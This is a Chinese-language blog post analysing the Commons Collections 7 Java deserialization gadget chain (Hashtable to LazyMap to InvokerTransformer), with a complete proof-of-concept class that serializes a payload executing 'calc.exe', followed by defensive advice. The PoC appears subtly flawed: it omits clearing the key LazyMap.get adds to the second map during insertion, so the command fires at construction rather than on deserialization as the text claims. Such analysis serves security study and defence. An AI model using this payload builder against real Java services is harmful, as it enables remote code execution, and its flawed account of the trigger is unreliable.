Commons Collections 7 反序列化漏洞分析<\/h1>

漏洞概述<\/h2>
Commons Collections 7 (CC7) 是 Apache Commons Collections 库中的一个反序列化漏洞，与 CC1 类似，但触发 LazyMap.get()<\/code> 方法的流程不同。CC7 通过 Hashtable<\/code> 类触发漏洞，利用链如下：<\/p>
Hashtable.readObject
Hashtable.reconstitutionPut
Hashtable.reconstitutionPut -> LazyMap.equals
    (LazyMap 未实现 equals，找父类 AbstractMapDecorator.equals)
    AbstractMapDecorator.equals -> HashMap.equals
        (HashMap 未实现 equals，找父类 AbstractMap.equals)
    AbstractMap.equals -> LazyMap.get
        ChainedTransformer.transform()
            ConstantTransformer.transform()
            InvokerTransformer.transform()
<\/code><\/pre>
漏洞利用链分析<\/h2>
1. 反序列化起点 - Hashtable.readObject<\/h3>
Hashtable<\/code> 的反序列化入口是 readObject<\/code> 方法：<\/p>
private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> s)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    \/\/ 读取基本属性
<\/span><\/span><\/span><\/span>    s.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 读取原始数组长度和元素数量
<\/span><\/span><\/span><\/span>    int<\/span> origlength =<\/span> s.<\/span>readInt<\/span>();<\/span>
<\/span><\/span>    int<\/span> elements =<\/span> s.<\/span>readInt<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 计算新的大小
<\/span><\/span><\/span><\/span>    int<\/span> length =<\/span> (<\/span>int<\/span>)(<\/span>elements *<\/span> loadFactor)<\/span> +<\/span> (<\/span>elements \/<\/span> 20<\/span>)<\/span> +<\/span> 3<\/span>;<\/span>
<\/span><\/span>    \/\/ ... 长度调整逻辑 ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    table =<\/span> new<\/span> Entry<?,?>[<\/span>length];<\/span>
<\/span><\/span>    threshold =<\/span> (<\/span>int<\/span>)<\/span>Math.<\/span>min<\/span>(<\/span>length *<\/span> loadFactor,<\/span> MAX_ARRAY_SIZE +<\/span> 1<\/span>);<\/span>
<\/span><\/span>    count =<\/span> 0<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 读取所有键值对
<\/span><\/span><\/span><\/span>    for<\/span> (;<\/span> elements ><\/span> 0<\/span>;<\/span> elements--)<\/span> {<\/span>
<\/span><\/span>        @SuppressWarnings<\/span>(<\/span>"unchecked"<\/span>)<\/span>
<\/span><\/span>        K key =<\/span> (<\/span>K)<\/span>s.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        @SuppressWarnings<\/span>(<\/span>"unchecked"<\/span>)<\/span>
<\/span><\/span>        V value =<\/span> (<\/span>V)<\/span>s.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 关键点：调用 reconstitutionPut 方法
<\/span><\/span><\/span><\/span>        reconstitutionPut(<\/span>table,<\/span> key,<\/span> value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. Hashtable.reconstitutionPut 方法<\/h3>
reconstitutionPut<\/code> 方法负责将键值对放入哈希表：<\/p>
private<\/span> void<\/span> reconstitutionPut<\/span>(<\/span>Entry<?,?>[]<\/span> tab,<\/span> K key,<\/span> V value)<\/span> throws<\/span> StreamCorruptedException {<\/span>
<\/span><\/span>    if<\/span> (<\/span>value ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>StreamCorruptedException<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 确保键不在哈希表中
<\/span><\/span><\/span><\/span>    int<\/span> hash =<\/span> key.<\/span>hashCode<\/span>();<\/span>
<\/span><\/span>    int<\/span> index =<\/span> (<\/span>hash &<\/span> 0x7FFFFFFF<\/span>)<\/span> %<\/span> tab.<\/span>length<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    for<\/span> (<\/span>Entry<?,?><\/span> e =<\/span> tab[<\/span>index];<\/span> e !=<\/span> null<\/span>;<\/span> e =<\/span> e.<\/span>next<\/span>)<\/span> {<\/span>
<\/span><\/span>        if<\/span> ((<\/span>e.<\/span>hash<\/span> ==<\/span> hash)<\/span> &&<\/span> e.<\/span>key<\/span>.<\/span>equals<\/span>(<\/span>key))<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>StreamCorruptedException<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建新条目
<\/span><\/span><\/span><\/span>    @SuppressWarnings<\/span>(<\/span>"unchecked"<\/span>)<\/span>
<\/span><\/span>    Entry<<\/span>K,<\/span>V><\/span> e =<\/span> (<\/span>Entry<<\/span>K,<\/span>V>)<\/span>tab[<\/span>index];<\/span>
<\/span><\/span>    tab[<\/span>index]<\/span> =<\/span> new<\/span> Entry<>(<\/span>hash,<\/span> key,<\/span> value,<\/span> e);<\/span>
<\/span><\/span>    count++;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 触发 LazyMap.equals<\/h3>
漏洞触发的关键在于 e.key.equals(key)<\/code> 这一行：<\/p>

第一次调用 reconstitutionPut<\/code> 时，tab<\/code> 为空，直接存入键值对<\/li>
第二次调用时，会检查键是否已存在，调用 e.key.equals(key)<\/code>

e.key<\/code> 是第一个 LazyMap<\/code> (map1)<\/li>
key<\/code> 是第二个 LazyMap<\/code> (map2)<\/li>
<\/ul>
<\/li>
<\/ol>
4. 方法调用链<\/h3>
LazyMap<\/code> 没有实现 equals<\/code> 方法，调用链如下：<\/p>

LazyMap.equals<\/code> → 调用父类 AbstractMapDecorator.equals<\/code><\/li>
AbstractMapDecorator.equals<\/code> → 调用 map.equals(object)<\/code>

map<\/code> 是创建 LazyMap<\/code> 时传入的 HashMap<\/code><\/li>
<\/ul>
<\/li>
HashMap.equals<\/code> → 调用父类 AbstractMap.equals<\/code><\/li>
<\/ol>
5. AbstractMap.equals 关键点<\/h3>
AbstractMap.equals<\/code> 方法的关键部分：<\/p>
public<\/span> boolean<\/span> equals<\/span>(<\/span>Object o)<\/span> {<\/span>
<\/span><\/span>    \/\/ ... 省略部分代码 ...
<\/span><\/span><\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Iterator<<\/span>Entry<<\/span>K,<\/span>V>><\/span> i =<\/span> entrySet().<\/span>iterator<\/span>();<\/span>
<\/span><\/span>        while<\/span> (<\/span>i.<\/span>hasNext<\/span>())<\/span> {<\/span>
<\/span><\/span>            Entry<<\/span>K,<\/span>V><\/span> e =<\/span> i.<\/span>next<\/span>();<\/span>
<\/span><\/span>            K key =<\/span> e.<\/span>getKey<\/span>();<\/span>
<\/span><\/span>            V value =<\/span> e.<\/span>getValue<\/span>();<\/span>
<\/span><\/span>            if<\/span> (<\/span>value ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                if<\/span> (!(<\/span>m.<\/span>get<\/span>(<\/span>key)==<\/span>null<\/span> &&<\/span> m.<\/span>containsKey<\/span>(<\/span>key)))<\/span>
<\/span><\/span>                    return<\/span> false<\/span>;<\/span>
<\/span><\/span>            }<\/span> else<\/span> {<\/span>
<\/span><\/span>                if<\/span> (!<\/span>value.<\/span>equals<\/span>(<\/span>m.<\/span>get<\/span>(<\/span>key)))<\/span> \/\/ 关键点：调用 LazyMap.get
<\/span><\/span><\/span><\/span>                    return<\/span> false<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ... 省略部分代码 ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>这里会调用 m.get(key)<\/code>，其中 m<\/code> 是我们的第二个 LazyMap<\/code>，从而触发 LazyMap.get<\/code> 方法。<\/p>
POC 分析<\/h2>
package<\/span> com.ysoserial;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.LazyMap;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.util.*;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> CommonCollections7<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        \/\/ 构造 Transformer 链
<\/span><\/span><\/span><\/span>        Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span>
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span>
<\/span><\/span>                new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span>
<\/span><\/span>                new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span>
<\/span><\/span>                new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span>
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span>
<\/span><\/span>                new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span>
<\/span><\/span>        });<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 创建两个 HashMap
<\/span><\/span><\/span><\/span>        HashMap hashMap1 =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        HashMap hashMap2 =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 装饰为 LazyMap
<\/span><\/span><\/span><\/span>        Map map1 =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>hashMap1,<\/span> transformerChain);<\/span>
<\/span><\/span>        map1.<\/span>put<\/span>(<\/span>"1"<\/span>,<\/span> 1<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Map map2 =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>hashMap2,<\/span> transformerChain);<\/span>
<\/span><\/span>        map2.<\/span>put<\/span>(<\/span>"2"<\/span>,<\/span> 2<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 创建 Hashtable 并放入两个 LazyMap
<\/span><\/span><\/span><\/span>        Hashtable hashtable =<\/span> new<\/span> Hashtable();<\/span>
<\/span><\/span>        hashtable.<\/span>put<\/span>(<\/span>map1,<\/span> 1<\/span>);<\/span>
<\/span><\/span>        hashtable.<\/span>put<\/span>(<\/span>map2,<\/span> 2<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream byteArrayOutputStream =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>byteArrayOutputStream);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>hashtable);<\/span>
<\/span><\/span>        byteArrayOutputStream.<\/span>flush<\/span>();<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> bytes =<\/span> byteArrayOutputStream.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 反序列化触发漏洞
<\/span><\/span><\/span><\/span>        ByteArrayInputStream byteArrayInputStream =<\/span> new<\/span> ByteArrayInputStream(<\/span>bytes);<\/span>
<\/span><\/span>        ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>byteArrayInputStream);<\/span>
<\/span><\/span>        objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键步骤解析<\/h2>


Transformer 链构造<\/strong>：<\/p>

使用 ChainedTransformer<\/code> 组合多个 Transformer<\/code><\/li>
最终执行 Runtime.getRuntime().exec("calc.exe")<\/code><\/li>
<\/ul>
<\/li>

LazyMap 创建<\/strong>：<\/p>

创建两个 HashMap<\/code> 并装饰为 LazyMap<\/code><\/li>
分别放入不同的键值对 ("1",1<\/code> 和 "2",2<\/code>)<\/li>
<\/ul>
<\/li>

Hashtable 利用<\/strong>：<\/p>

将两个 LazyMap<\/code> 作为键放入 Hashtable<\/code><\/li>
序列化后再反序列化时触发漏洞<\/li>
<\/ul>
<\/li>

漏洞触发流程<\/strong>：<\/p>

反序列化时 Hashtable.readObject<\/code> 调用 reconstitutionPut<\/code><\/li>
reconstitutionPut<\/code> 中比较两个 LazyMap<\/code> 时调用 equals<\/code><\/li>
equals<\/code> 方法最终调用 LazyMap.get<\/code><\/li>
LazyMap.get<\/code> 触发 Transformer<\/code> 链执行命令<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h2>

升级 Apache Commons Collections 到安全版本<\/li>
使用 Java 反序列化过滤器 (ObjectInputFilter)<\/li>
避免反序列化不可信数据<\/li>
使用白名单机制限制可反序列化的类<\/li>
<\/ol>
总结<\/h2>
CC7 漏洞利用 Hashtable<\/code> 反序列化时比较键的特性，通过 LazyMap.equals<\/code> 方法调用链最终触发 LazyMap.get<\/code> 方法执行恶意代码。与 CC1 相比，CC7 提供了另一种触发 LazyMap.get<\/code> 的路径，增加了漏洞利用的灵活性。理解这一漏洞有助于更好地防御 Java 反序列化攻击。<\/p>